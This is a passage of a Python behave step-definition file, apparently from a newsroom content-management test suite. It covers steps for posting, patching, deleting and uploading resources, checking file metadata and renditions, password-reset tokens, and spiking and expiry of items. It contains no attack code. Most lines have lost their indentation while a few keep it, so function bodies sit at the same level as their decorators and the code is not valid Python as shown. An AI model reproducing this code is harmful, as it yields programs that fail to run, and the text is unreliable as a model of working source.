set_placeholder(context, '{}.{}'.format(provider_name, item['guid']), item['_id'])
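# fetch_from_provider() drives one ingest cycle: it loads the provider definition,
# parses a local fixture file for the file-based providers (XML, e-mail or other
# feed parsers) or calls fetch_ingest() for the rest, optionally applies a routing
# scheme and rule set, ingests the items and stores a "<provider>.<guid>"
# placeholder pointing at the new item _id.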
@when('we post to "{url}"')
def step_impl_when_post_url(context, url):
post_data(context, url)
@when('we post to "{url}" with delay')
def step_impl_when_post_url_delay(context, url):
time.sleep(1)
post_data(context, url)
def set_user_default(url, data):
    if is_user_resource(url):
        user = json.loads(data)
        user.setdefault('needs_activation', False)
        data = json.dumps(user)
    return data
def get_response_etag(response):
return json.loads(response.get_data())['_etag']
@when('we save etag')
def step_when_we_save_etag(context):
context.etag = get_response_etag(context.response)
@then('we get same etag')
def step_then_we_get_same_etag(context):
assert context.etag == get_response_etag(context.response), 'etags not matching'
def store_placeholder(context, url):
if context.response.status_code in (200, 201):
item = json.loads(context.response.get_data())
if item['_status'] == 'OK' and item.get('_id'):
try:
setattr(context, get_resource_name(url), item)
except (IndexError, KeyError):
pass
def post_data(context, url, success=False):
with context.app.mail.record_messages() as outbox:
data = apply_placeholders(context, context.text)
url = apply_placeholders(context, url)
        data = set_user_default(url, data)
context.response = context.client.post(get_prefixed_url(context.app, url),
data=data, headers=context.headers)
if success:
assert_ok(context.response)
item = json.loads(context.response.get_data())
context.outbox = outbox
store_placeholder(context, url)
return item
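# post_data() is the shared helper behind the "we post to ..." steps: it expands
# placeholders in both URL and body, records outgoing mail on context.outbox and,
# via store_placeholder(), keeps the created resource on the context (e.g.
# context.archive after a POST to "/archive").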
@when('we post to "{url}" with "{tag}" and success')
def step_impl_when_post_url_with_tag(context, url, tag):
item = post_data(context, url, True)
if item.get('_id'):
set_placeholder(context, tag, item.get('_id'))
@given('we have "{url}" with "{tag}" and success')
def step_impl_given_post_url_with_tag(context, url, tag):
item = post_data(context, url, True)
if item.get('_id'):
set_placeholder(context, tag, item.get('_id'))
@when('we post to "{url}" with success')
def step_impl_when_post_url_with_success(context, url):
post_data(context, url, True)
@when('we put to "{url}"')
def step_impl_when_put_url(context, url):
with context.app.mail.record_messages() as outbox:
        data = apply_placeholders(context, context.text)
        url = apply_placeholders(context, url)
        res = get_res(url, context)
        href = get_self_href(res, context)
        context.response = context.client.put(get_prefixed_url(context.app, href), data=data, headers=context.headers)
assert_ok(context.response)
context.outbox = outbox
@when('we get "{url}"')
def when_we_get_url(context, url):
url = apply_placeholders(context, url).encode('ascii').decode('unicode-escape')
headers = []
if context.text:
for line in context.text.split('\n'):
key, val = line.split(': ')
headers.append((key, val))
headers = unique_headers(headers, context.headers)
url = apply_placeholders(context, url)
context.response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
@when('we get dictionary "{dictionary_id}"')
def when_we_get_dictionary(context, dictionary_id):
dictionary_id = apply_placeholders(context, dictionary_id)
url = '/dictionaries/' + dictionary_id + '?projection={"content": 1}'
return when_we_get_url(context, url)
@then('we get latest')
def step_impl_we_get_latest(context):
data = get_json_data(context.response)
href = get_self_href(data, context)
headers = if_match(context, data.get('_etag'))
href = get_prefixed_url(context.app, href)
context.response = context.client.get(href, headers=headers)
assert_200(context.response)
@when('we find for "{resource}" the id as "{name}" by "{search_criteria}"')
def when_we_find_for_resource_the_id_as_name_by_search_criteria(context, resource, name, search_criteria):
url = '/' + resource + '?' + search_criteria
context.response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
if context.response.status_code == 200:
expect_json_length(context.response, 1, path='_items')
item = json.loads(context.response.get_data())
item = item['_items'][0]
if item.get('_id'):
set_placeholder(context, name, item['_id'])
@when('we delete "{url}"')
def step_impl_when_delete_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
href = get_prefixed_url(context.app, href)
context.response = context.client.delete(href, headers=headers)
context.outbox = outbox
@when('we delete link "{url}"')
def step_impl_when_delete_link_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
headers = context.headers
context.response = context.client.delete(get_prefixed_url(context.app, url), headers=headers)
context.outbox = outbox
@when('we delete all sessions "{url}"')
def step_impl_when_delete_all_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
headers = context.headers
href = get_prefixed_url(context.app, url)
context.response = context.client.delete(href, headers=headers)
context.outbox = outbox
@when('we delete latest')
def when_we_delete_it(context):
with context.app.mail.record_messages() as outbox:
res = get_json_data(context.response)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
href = get_prefixed_url(context.app, href)
context.response = context.client.delete(href, headers=headers)
context.email = outbox
@when('we patch "{url}"')
def step_impl_when_patch_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
data = apply_placeholders(context, context.text)
href = get_prefixed_url(context.app, href)
context.response = context.client.patch(href, data=data, headers=headers)
context.outbox = outbox
@when('we patch latest')
def step_impl_when_patch_again(context):
with context.app.mail.record_messages() as outbox:
data = get_json_data(context.response)
href = get_prefixed_url(context.app, get_self_href(data, context))
headers = if_match(context, data.get('_etag'))
data2 = apply_placeholders(context, context.text)
context.response = context.client.patch(href, data=data2, headers=headers)
if context.response.status_code in (200, 201):
item = json.loads(context.response.get_data())
if item['_status'] == 'OK' and item.get('_id'):
setattr(context, get_resource_name(href), item)
assert_ok(context.response)
context.outbox = outbox
@when('we patch latest without assert')
def step_impl_when_patch_without_assert(context):
data = get_json_data(context.response)
href = get_prefixed_url(context.app, get_self_href(data, context))
headers = if_match(context, data.get('_etag'))
data2 = apply_placeholders(context, context.text)
context.response = context.client.patch(href, data=data2, headers=headers)
@when('we patch routing scheme "{url}"')
def step_impl_when_patch_routing_scheme(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
data = json.loads(apply_placeholders(context, context.text))
res.get('rules', []).append(data)
context.response = context.client.patch(get_prefixed_url(context.app, href),
data=json.dumps({'rules': res.get('rules', [])}),
headers=headers)
context.outbox = outbox
@when('we patch given')
def step_impl_when_patch(context):
with context.app.mail.record_messages() as outbox:
href, etag = get_it(context)
headers = if_match(context, etag)
context.response = context.client.patch(get_prefixed_url(context.app, href), data=context.text, headers=headers)
assert_ok(context.response)
context.outbox = outbox
@when('we get given')
def step_impl_when_get(context):
href, _etag = get_it(context)
context.response = context.client.get(get_prefixed_url(context.app, href), headers=context.headers)
@when('we restore version {version}')
def step_impl_when_restore_version(context, version):
data = get_json_data(context.response)
href = get_self_href(data, context)
headers = if_match(context, data.get('_etag'))
text = '{"type": "text", "old_version": %s, "last_version": %s}' % (version, data.get('_current_version'))
context.response = context.client.put(get_prefixed_url(context.app, href), data=text, headers=headers)
assert_ok(context.response)
@when('we upload a file "{filename}" to "{dest}"')
def step_impl_when_upload_image(context, filename, dest):
upload_file(context, dest, filename, 'media')
@when('we upload a binary file with cropping')
def step_impl_when_upload_with_crop(context):
data = {'CropTop': '0', 'CropLeft': '0', 'CropBottom': '333', 'CropRight': '333'}
upload_file(context, '/upload', 'bike.jpg', 'media', data)
@when('upload a file "{file_name}" to "{destination}" with "{guid}"')
def step_impl_when_upload_image_with_guid(context, file_name, destination, guid):
upload_file(context, destination, file_name, 'media', {'guid': guid})
if destination == 'archive':
set_placeholder(context, 'original.href', context.archive['renditions']['original']['href'])
set_placeholder(context, 'original.media', context.archive['renditions']['original']['media'])
@when('we upload a new dictionary with success')
def when_upload_dictionary(context):
data = json.loads(apply_placeholders(context, context.text))
upload_file(context, '/dictionaries', 'test_dict.txt', DICTIONARY_FILE, data)
assert_ok(context.response)
@when('we upload to an existing dictionary with success')
def when_upload_patch_dictionary(context):
data = json.loads(apply_placeholders(context, context.text))
url = apply_placeholders(context, '/dictionaries/#dictionaries._id#')
etag = apply_placeholders(context, '#dictionaries._etag#')
upload_file(context, url, 'test_dict2.txt', DICTIONARY_FILE, data, 'patch', [('If-Match', etag)])
assert_ok(context.response)
def upload_file(context, dest, filename, file_field, extra_data=None, method='post', user_headers=[]):
with open(get_fixture_path(context, filename), 'rb') as f:
data = {file_field: f}
if extra_data:
data.update(extra_data)
headers = [('Content-Type', 'multipart/form-data')]
headers.extend(user_headers)
headers = unique_headers(headers, context.headers)
url = get_prefixed_url(context.app, dest)
context.response = getattr(context.client, method)(url, data=data, headers=headers)
assert_ok(context.response)
store_placeholder(context, url)
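# upload_file() sends a multipart/form-data request (POST or PATCH) with the file
# under `file_field` plus any extra form fields, then stores the response on the
# context the same way post_data() does.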
@when('we upload a file from URL')
def step_impl_when_upload_from_url(context):
data = {'URL': external_url}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/upload'), data=data, headers=headers)
@when('we upload a file from URL with cropping')
def step_impl_when_upload_from_url_with_crop(context):
data = {'URL': external_url,
'CropTop': '0',
'CropLeft': '0',
'CropBottom': '333',
'CropRight': '333'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/upload'), data=data, headers=headers)
@when('we get user profile')
def step_impl_when_get_user(context):
profile_url = '/%s/%s' % ('users', context.user['_id'])
context.response = context.client.get(get_prefixed_url(context.app, profile_url), headers=context.headers)
@then('we get new resource')
def step_impl_then_get_new(context):
assert_ok(context.response)
expect_json_contains(context.response, 'self', path='_links')
if context.text is not None:
return test_json(context)
@then('we get error {code}')
def step_impl_then_get_error(context, code):
expect_status(context.response, int(code))
if context.text:
test_json(context)
@then('we get list with {total_count} items')
def step_impl_then_get_list(context, total_count):
assert_200(context.response)
data = get_json_data(context.response)
int_count = int(total_count.replace('+', '').replace('<', ''))
if '+' in total_count:
assert int_count <= data['_meta']['total'], '%d items is not enough' % data['_meta']['total']
elif total_count.startswith('<'):
assert int_count > data['_meta']['total'], '%d items is too much' % data['_meta']['total']
else:
assert int_count == data['_meta']['total'], 'got %d: %s' % (data['_meta']['total'],
format_items(data['_items']))
if context.text:
test_json(context)
@then('we get list ordered by {field} with {total_count} items')
def step_impl_ordered_list(context, field, total_count):
step_impl_then_get_list(context, total_count)
data = get_json_data(context.response)
fields = []
for i in data['_items']:
fields.append(i[field])
assert sorted(fields) == fields
@then('we get "{value}" in formatted output')
def step_impl_then_get_formatted_output(context, value):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if value in item['formatted_item']:
return
    assert False, '"%s" not found in any formatted_item' % value
@then('we get "{value}" in formatted output as "{group}" story for subscriber "{sub}"')
def step_impl_then_get_formatted_output_as_story(context, value, group, sub):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if item['subscriber_id'] != sub:
continue
try:
formatted_data = json.loads(item['formatted_item'])
except Exception:
continue
associations = formatted_data.get('associations', {})
for assoc_group in associations:
if assoc_group.startswith(group) and associations[assoc_group].get('guid', '') == value:
return
    assert False, '"%s" not found as "%s" association for subscriber "%s"' % (value, group, sub)
@then('we get "{value}" as "{group}" story for subscriber "{sub}" in package "{pck}"')
def step_impl_then_get_formatted_output_pck(context, value, group, sub, pck):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if item['item_id'] != pck:
continue
if item['subscriber_id'] != sub:
continue
try:
formatted_data = json.loads(item['formatted_item'])
except Exception:
continue
associations = formatted_data.get('associations', {})
for assoc_group in associations:
if assoc_group.startswith(group) and associations[assoc_group].get('guid', '') == value:
return
    assert False, '"%s" not found as "%s" association for subscriber "%s" in package "%s"' % (value, group, sub, pck)
@then('we get "{value}" as "{group}" story for subscriber "{sub}" not in package "{pck}" version "{v}"')
def step_impl_then_get_formatted_output_pck_version(context, value, group, sub, pck, v):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if item['item_id'] == pck:
if item['subscriber_id'] == sub and str(item['item_version']) == v:
try:
formatted_data = json.loads(item['formatted_item'])
except Exception:
continue
associations = formatted_data.get('associations', {})
for assoc_group in associations:
                    if assoc_group.startswith(group) \
                            and associations[assoc_group].get('guid', '') == value:
                        assert False, '"%s" should not be in package "%s" version "%s"' % (value, pck, v)
                return
    assert False, 'package "%s" for subscriber "%s" version "%s" not found' % (pck, sub, v)
@then('we get "{value}" in formatted output as "{group}" newsml12 story')
def step_impl_then_get_formatted_output_newsml(context, value, group):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if '<' + group + '>' + value + '</' + group + '>' in item['formatted_item']:
return
    assert False, '<%s>%s</%s> not found in any formatted_item' % (group, value, group)
@then('we get no "{field}"')
def step_impl_then_get_nofield(context, field):
assert_200(context.response)
expect_json_not_contains(context.response, field)
@then('expect json in "{path}"')
def step_impl_then_get_nofield_in_path(context, path):
assert_200(context.response)
expect_json(context.response, context.text, path)
@then('we get existing resource')
def step_impl_then_get_existing(context):
assert_200(context.response)
test_json(context)
@then('we get existing saved search')
def step_impl_then_get_existing_saved_search(context):
assert_200(context.response)
test_json_with_string_field_value(context, 'filter')
@then('we get OK response')
def step_impl_then_get_ok(context):
assert_200(context.response)
@then('we get response code {code}')
def step_impl_then_get_code(context, code):
expect_status(context.response, int(code))
@then('we get updated response')
def step_impl_then_get_updated(context):
assert_ok(context.response)
if context.text:
test_json(context)
@then('we get "{key}" in "{url}"')
def step_impl_then_get_key_in_url(context, key, url):
url = apply_placeholders(context, url)
res = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
assert_200(res)
expect_json_contains(res, key)
@then('we get file metadata')
def step_impl_then_get_file_meta(context):
    assert len(
        json.loads(apply_path(
            parse_json_response(context.response),
            'filemeta_json'
        )).items()
    ) > 0, 'expected non empty metadata dictionary'
@then('we get "{filename}" metadata')
def step_impl_then_get_given_file_meta(context, filename):
if filename == 'bike.jpg':
metadata = {
'ycbcrpositioning': 1,
'imagelength': 2448,
'exifimagewidth': 2448,
'meteringmode': 2,
'datetimedigitized': '2013:08:01 16:19:28',
'exposuremode': 0,
'flashpixversion': '0100',
'isospeedratings': 80,
'length': 469900,
'imageuniqueid': 'f3533c05daef2debe6257fd99e058eec',
'datetimeoriginal': '2013:08:01 16:19:28',
'whitebalance': 0,
'exposureprogram': 3,
'colorspace': 1,
'exifimageheight': 3264,
'software': 'Google',
'resolutionunit': 2,
'make': 'SAMSUNG',
'maxaperturevalue': [276, 100],
'aperturevalue': [276, 100],
'scenecapturetype': 0,
'exposuretime': [1, 2004],
'datetime': '2013:08:01 16:19:28',
'exifoffset': 216,
'yresolution': [72, 1],
'orientation': 1,
'componentsconfiguration': '0000',
'exifversion': '0220',
'focallength': [37, 10],
'flash': 0,
'model': 'GT-I9300',
'xresolution': [72, 1],
'fnumber': [26, 10],
'imagewidth': 3264,
'brightnessvalue': [2362, 256],
'exposurebiasvalue': [0, 10],
'shutterspeedvalue': [2808, 256]
}
elif filename == 'green.ogg':
metadata = {
'producer': 'Lavf54.59.103',
'music_genre': 'New Age',
'sample_rate': '44100',
'artist': 'Maxime Abbey',
'length': 368058,
'bit_rate': '160000',
'title': 'Green Hills',
'mime_type': 'audio/vorbis',
'format_version': 'Vorbis version 0',
'compression': 'Vorbis',
'duration': '0:00:20.088163',
'endian': 'Little endian',
'nb_channel': '2'
}
elif filename == 'this_week_nasa.mp4':
metadata = {
'mime_type': 'video/mp4',
'creation_date': '1904-01-01T00:00:00+00:00',
'duration': '0:00:10.224000',
'width': '480',
'length': 877869,
'comment': 'User volume: 100.0%',
'height': '270',
'endian': 'Big endian',
'last_modification': '1904-01-01T00:00:00+00:00'
}
else:
raise NotImplementedError("No metadata for file '{}'.".format(filename))
assertions.maxDiff = None
data = json.loads(context.response.get_data())
filemeta = get_filemeta(data)
    assert json_match(metadata, filemeta), filemeta
@then('we get "{type}" renditions')
def step_impl_then_get_renditions(context, type):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
for rend_name in context.app.config['RENDITIONS'][type]:
desc = renditions[rend_name]
assert isinstance(desc, dict), 'expected dict for rendition description'
assert 'href' in desc, 'expected href in rendition description'
assert 'media' in desc, 'expected media identifier in rendition description'
we_can_fetch_a_file(context, desc['href'], 'image/jpeg')
@then('we get "{crop_name}" in renditions')
def step_impl_then_get_crop_in_renditions(context, crop_name):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
desc = renditions[crop_name]
assert isinstance(desc, dict), 'expected dict for rendition description'
assert 'href' in desc, 'expected href in rendition description'
assert 'media' in desc, 'expected media identifier in rendition description'
we_can_fetch_a_file(context, desc['href'], 'image/jpeg')
@then('we get "{crop_name}" not in renditions')
def step_impl_then_crop_not_in_renditions(context, crop_name):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
assert crop_name not in renditions, 'expected crop not in renditions'
@then('item "{item_id}" is unlocked')
def then_item_is_unlocked(context, item_id):
assert_200(context.response)
data = json.loads(context.response.get_data())
assert data.get('lock_user', None) is None, 'item is locked by user #{0}'.format(data.get('lock_user'))
@then('item "{item_id}" is locked')
def then_item_is_locked(context, item_id):
assert_200(context.response)
resp = parse_json_response(context.response)
assert resp['lock_user'] is not None
@then('item "{item_id}" is assigned')
def then_item_is_assigned(context, item_id):
resp = parse_json_response(context.response)
assert resp['task'].get('user', None) is not None, 'item is not assigned'
@then('we get rendition "{name}" with mimetype "{mimetype}"')
def step_impl_then_get_rendition_with_mimetype(context, name, mimetype):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
desc = renditions[name]
assert isinstance(desc, dict), 'expected dict for rendition description'
assert 'href' in desc, 'expected href in rendition description'
we_can_fetch_a_file(context, desc['href'], mimetype)
set_placeholder(context, "rendition.{}.href".format(name), desc['href'])
@when('we get updated media from archive')
def get_updated_media_from_archive(context):
url = 'archive/%s' % context._id
when_we_get_url(context, url)
assert_200(context.response)
@then('baseImage rendition is updated')
def check_base_image_rendition(context):
check_rendition(context, 'baseImage')
@then('original rendition is updated with link to file having mimetype "{mimetype}"')
def check_original_rendition(context, mimetype):
rv = parse_json_response(context.response)
link_to_file = rv['renditions']['original']['href']
assert link_to_file
we_can_fetch_a_file(context, link_to_file, mimetype)
@then('thumbnail rendition is updated')
def check_thumbnail_rendition(context):
check_rendition(context, 'thumbnail')
def check_rendition(context, rendition_name):
rv = parse_json_response(context.response)
assert rv['renditions'][rendition_name] != context.renditions[rendition_name], rv['renditions']
@then('we get "{key}"')
def step_impl_then_get_key(context, key):
assert_200(context.response)
expect_json_contains(context.response, key)
item = json.loads(context.response.get_data())
set_placeholder(context, '%s' % key, item[key])
@then('we store "{key}" with value "{value}" to context')
def step_impl_then_we_store_key_value_to_context(context, key, value):
set_placeholder(context, key, apply_placeholders(context, value))
@then('we get action in user activity')
def step_impl_then_get_action(context):
response = context.client.get(get_prefixed_url(context.app, '/activity'), headers=context.headers)
expect_json_contains(response, '_items')
@then('we get a file reference')
def step_impl_then_get_file(context):
assert_200(context.response)
expect_json_contains(context.response, 'renditions')
data = get_json_data(context.response)
url = '/upload/%s' % data['_id']
headers = [('Accept', 'application/json')]
headers = unique_headers(headers, context.headers)
response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
assert_200(response)
assert len(response.get_data()), response
assert response.mimetype == 'application/json', response.mimetype
expect_json_contains(response, 'renditions')
expect_json_contains(response, {'mimetype': 'image/jpeg'})
fetched_data = get_json_data(context.response)
context.fetched_data = fetched_data
@then('we get cropped data smaller than "{max_size}"')
def step_impl_then_get_cropped_file(context, max_size):
assert int(get_filemeta(context.fetched_data, 'length')) < int(max_size), 'was expecting smaller image'
@then('we can fetch a data_uri')
def step_impl_we_fetch_data_uri(context):
we_can_fetch_a_file(context, context.fetched_data['renditions']['original']['href'], 'image/jpeg')
@then('we fetch a file "{url}"')
def step_impl_we_cannot_fetch_file(context, url):
url = apply_placeholders(context, url)
headers = [('Accept', 'application/json')]
headers = unique_headers(headers, context.headers)
context.response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
def we_can_fetch_a_file(context, url, mimetype):
headers = [('Accept', 'application/json')]
headers = unique_headers(headers, context.headers)
response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
assert_200(response)
assert len(response.get_data()), response
assert response.mimetype == mimetype, response.mimetype
@then('we can delete that file')
def step_impl_we_delete_file(context):
url = '/upload/%s' % context.fetched_data['_id']
context.headers.append(('Accept', 'application/json'))
headers = if_match(context, context.fetched_data.get('_etag'))
response = context.client.delete(get_prefixed_url(context.app, url), headers=headers)
assert_200(response)
response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
assert_404(response)
@then('we get a picture url')
def step_impl_then_get_picture(context):
assert_ok(context.response)
expect_json_contains(context.response, 'picture_url')
@then('we get aggregations "{keys}"')
def step_impl_then_get_aggs(context, keys):
assert_200(context.response)
expect_json_contains(context.response, '_aggregations')
data = get_json_data(context.response)
aggs = data['_aggregations']
for key in keys.split(','):
assert_in(key, aggs)
@then('the file is stored localy')
def step_impl_then_file(context):
assert_200(context.response)
folder = context.app.config['UPLOAD_FOLDER']
assert os.path.exists(os.path.join(folder, context.filename))
@then('we get version {version}')
def step_impl_then_get_version(context, version):
assert_200(context.response)
expect_json_contains(context.response, {'_current_version': int(version)})
@then('the field "{field}" value is "{value}"')
def step_impl_then_get_field_value(context, field, value):
assert_200(context.response)
expect_json_contains(context.response, {field: value})
@then('we get etag matching "{url}"')
def step_impl_then_get_etag(context, url):
if context.app.config['IF_MATCH']:
assert_200(context.response)
expect_json_contains(context.response, '_etag')
etag = get_json_data(context.response).get('_etag')
response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
expect_json_contains(response, {'_etag': etag})
@then('we get not modified response')
def step_impl_then_not_modified(context):
expect_status(context.response, 304)
@then('we get "{header}" header')
def step_impl_then_get_header(context, header):
expect_headers_contain(context.response, header)
@then('we get "{header}" header with "{type}" type')
def step_impl_then_get_header_with_type(context, header, type):
expect_headers_contain(context.response, header, type)
@then('we get link to "{resource}"')
def then_we_get_link_to_resource(context, resource):
doc = get_json_data(context.response)
self_link = doc.get('_links').get('self')
assert resource in self_link['href'], 'expect link to "%s", got %s' % (resource, self_link)
@then('we get deleted response')
def then_we_get_deleted_response(context):
assert_200(context.response)
@when('we post to reset_password we get email with token')
def we_post_to_reset_password(context):
data = {'email': '[email protected]'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
with context.app.mail.record_messages() as outbox:
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (200, 201))
assert len(outbox) == 1
assert outbox[0].subject == "Reset password"
email_text = outbox[0].body
assert "24" in email_text
words = email_text.split()
url = urlparse(words[words.index("link") + 1])
token = url.fragment.split('token=')[-1]
assert token
context.token = token
@then('we can check if token is valid')
def we_can_check_token_is_valid(context):
data = {'token': context.token}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (200, 201))
@then('we update token to be expired')
def we_update_token_to_expired(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
expiry = utc.utcnow() - timedelta(days=2)
reset_request = get_resource_service('reset_user_password').find_one(req=None, token=context.token)
reset_request['expire_time'] = expiry
id = reset_request.pop('_id')
get_resource_service('reset_user_password').patch(id, reset_request)
@then('token is invalid')
def check_token_invalid(context):
data = {'token': context.token}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (403, 401))
@when('we post to reset_password we do not get email with token')
def we_post_to_reset_password_it_fails(context):
data = {'email': '[email protected]'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
with context.app.mail.record_messages() as outbox:
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (200, 201))
assert len(outbox) == 0
def start_reset_password_for_user(context):
data = {'token': context.token, 'password': 'test_pass'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
@then('we fail to reset password for user')
def we_fail_to_reset_password_for_user(context):
start_reset_password_for_user(context)
step_impl_then_get_error(context, 403)
@then('we reset password for user')
def we_reset_password_for_user(context):
start_reset_password_for_user(context)
expect_status_in(context.response, (200, 201))
auth_data = {'username': 'foo', 'password': 'test_pass'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/auth_db'), data=auth_data, headers=headers)
expect_status_in(context.response, (200, 201))
@when('we switch user')
def when_we_switch_user(context):
user = {'username': 'test-user-2', 'password': 'pwd', 'is_active': True,
'needs_activation': False, 'sign_off': 'foo'}
tests.setup_auth_user(context, user)
set_placeholder(context, 'USERS_ID', str(context.user['_id']))
@when('we setup test user')
def when_we_setup_test_user(context):
tests.setup_auth_user(context, tests.test_user)
@when('we get my "{url}"')
def when_we_get_my_url(context, url):
user_id = str(context.user.get('_id'))
my_url = '{0}?where={1}'.format(url, json.dumps({'user': user_id}))
return when_we_get_url(context, my_url)
@when('we get user "{resource}"')
def when_we_get_user_resource(context, resource):
url = '/users/{0}/{1}'.format(str(context.user.get('_id')), resource)
return when_we_get_url(context, url)
@then('we get embedded items')
def we_get_embedded_items(context):
response_data = json.loads(context.response.get_data())
href = get_self_href(response_data, context)
url = href + '/?embedded={"items": 1}'
context.response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
assert_200(context.response)
context.response_data = json.loads(context.response.get_data())
assert len(context.response_data['items']['view_items']) == 2
@when('we reset notifications')
def step_when_we_reset_notifications(context):
context.app.notification_client.reset()
@then('we get notifications')
def then_we_get_notifications(context):
assert hasattr(context.app.notification_client, 'messages'), 'no messages'
notifications = context.app.notification_client.messages
notifications_data = [json.loads(notification) for notification in notifications]
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data, notifications_data), True,
msg=str(context_data) + '\n != \n' + str(notifications_data))
@then('we get default preferences')
def get_default_prefs(context):
response_data = json.loads(context.response.get_data())
assert_equal(response_data['user_preferences'], default_user_preferences)
@when('we spike "{item_id}"')
def step_impl_when_spike_url(context, item_id):
item_id = apply_placeholders(context, item_id)
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/spike/' + item_id),
data='{"state": "spiked"}', headers=headers)
@when('we spike fetched item')
def step_impl_when_spike_fetched_item(context):
data = json.loads(apply_placeholders(context, context.text))
item_id = data["_id"]
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/spike/' + item_id),
data='{"state": "spiked"}', headers=headers)
@when('we unspike "{item_id}"')
def step_impl_when_unspike_url(context, item_id):
item_id = apply_placeholders(context, item_id)
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/unspike/' + item_id),
data=apply_placeholders(context, context.text or '{}'), headers=headers)
@then('we get spiked content "{item_id}"')
def get_spiked_content(context, item_id):
item_id = apply_placeholders(context, item_id)
url = 'archive/{0}'.format(item_id)
when_we_get_url(context, url)
assert_200(context.response)
response_data = json.loads(context.response.get_data())
assert_equal(response_data['state'], 'spiked')
assert_equal(response_data['operation'], 'spike')
@then('we get unspiked content "{id}"')
def get_unspiked_content(context, id):
text = context.text
context.text = ''
url = 'archive/{0}'.format(id)
when_we_get_url(context, url)
assert_200(context.response)
response_data = json.loads(context.response.get_data())
assert_equal(response_data['state'], 'draft')
assert_equal(response_data['operation'], 'unspike')
# Tolga Akin (05/11/14)
# Expiry value doesn't get set to None properly in Elastic.
# Discussed with Petr so we'll look into this later
# assert_equal(response_data['expiry'], None)
if text:
assert json_match(json.loads(apply_placeholders(context, text)), response_data)
@then('we get global content expiry')
def get_global_content_expiry(context):
validate_expired_content(context, context.app.config['CONTENT_EXPIRY_MINUTES'], utcnow())
@then('we get content expiry {minutes}')
def get_content_expiry(context, minutes):
validate_expired_content(context, minutes, utcnow())
@then('we get expiry for schedule and embargo content {minutes} minutes after "{future_date}"')
def get_content_expiry_schedule(context, minutes, future_date):
future_date = parse_date(apply_placeholders(context, future_date))
validate_expired_content(context, minutes, future_date)
@then('we get desk spike expiry after "{test_minutes}"')
def get_desk_spike_expiry(context, test_minutes):
validate_expired_content(context, test_minutes, utcnow())
def validate_expired_content(context, minutes, start_datetime):
response_data = json.loads(context.response.get_data())
assert response_data['expiry']
response_expiry = parse_date(response_data['expiry'])
expiry = start_datetime + timedelta(minutes=int(minutes))
assert response_expiry <= expiry
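# validate_expired_content() checks that the item's expiry is no later than
# start_datetime plus the given number of minutes, e.g. utcnow() plus the
# configured CONTENT_EXPIRY_MINUTES in the global expiry step above.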
@when('we mention user in comment for "{url}"')
def we_mention_user_in_comment(context, url):
with context.app.mail.record_messages() as outbox:
